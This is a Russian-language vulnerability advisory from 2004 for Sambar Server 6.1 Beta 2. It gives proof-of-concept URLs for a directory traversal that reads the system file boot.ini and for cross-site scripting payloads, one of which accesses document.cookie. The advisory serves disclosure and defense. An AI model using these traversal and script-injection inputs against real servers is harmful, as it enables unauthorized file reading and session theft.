Несколько уязвимостей в Sambar Server

Дата публикации:
02.06.2004
Всего просмотров:
801
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Sambar Server 6.x
Уязвимые версии: Sambar Server 6.1 Beta 2

Описание: Несколько уязвимостей обнаружено в Sambar Server. Удаленный авторизованный администратор может просматривать файлы, расположенные вне Sambar Server директории. Удаленный пользователь также может выполнить XSS нападение.

1. Раскрытие файлов:

http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini
http://localhost/sys admin/system/showlog.asp?log=c:\boot.ini&tail=y
По умолчанию, администрировать Sambar возможно только с localhost.

2. XSS:

 http://localhost/sysadmin/system/sho w.asp?show=<script>alert("oops")</script>
http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>

URL производителя:http://www.sambar.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] =?iso-8859-1?Q?Sambar_Proxy_Multible_Vulnerabilities?=

или введите имя

CAPTCHA